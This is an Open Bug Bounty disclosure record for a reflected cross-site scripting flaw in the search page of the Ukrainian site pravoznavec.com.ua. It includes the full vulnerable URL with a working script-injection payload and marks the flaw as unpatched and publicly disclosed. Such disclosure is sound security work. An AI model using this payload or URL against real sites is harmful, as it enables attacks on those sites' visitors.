pravoznavec.com.ua XSS vulnerability

2017-07-03T02:13:00
ID OBB:257306
Type openbugbounty
Reporter OmniGooch
Modified 2017-07-10T03:15:00

Description

Vulnerable URL:
http://pravoznavec.com.ua/search.php?cx=partner-pub-6236678139346080%3A1964529854&cof;=FORID%3A11&ie;=windows-1251&q;=%3C%2Fscript%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSSPOSED%2F%29%3E&sa;=%CF%EE%E8%F1%EA&siteurl;=pravoznavec.com.ua%2F&ref;=&ss;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 29.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 773475
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 3 July, 2017 02:13 GMT
Generic security notifications sent to website owner| 3 July, 2017 02:16 GMT
Vulnerability details disclosed by researcher| 10 July, 2017 03:15 GMT